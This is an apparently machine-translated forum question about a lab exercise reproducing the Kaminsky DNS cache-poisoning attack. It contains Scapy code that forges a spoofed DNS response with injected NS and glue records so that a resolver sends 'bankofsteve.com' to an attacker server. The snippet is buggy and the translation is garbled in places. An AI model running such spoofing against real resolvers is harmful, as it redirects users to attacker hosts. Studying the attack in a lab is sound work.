我正试图表演“丹的神龛”#34;"在this tutorial中描述的,我成功地嗅探了根DNS ip,端口和查询ID,但是当我尝试构建响应数据包以毒化递归服务器的缓存时,我收到错误的数据包错误信息Wireshark的。这是构建数据包的代码:
pkt = (IP( src = sniffed_ip, dst='192.168.56.20')
/ UDP(sport=53, dport=sniffed_port)
/ DNS(id=query_id, qr=1, nscount=1, an=None, arcount=1,
qd=DNSRR(rrname='bankofsteve.com', rdata='192.168.56.1', type="A"),
ns=(DNSRR(rrname = 'bankofsteve.com', type='NS', ttl=36000, rdata='ns.bankofallan.co.uk.')),
ar=(DNSRR(rrname='ns.bankofsteve.com.', type="A", ttl=36000, rdata='192.168.56.1'))))
' 192.168.56.1'是坏的DNS服务器的IP,而' 192.168.56.20'是目标递归服务器的IP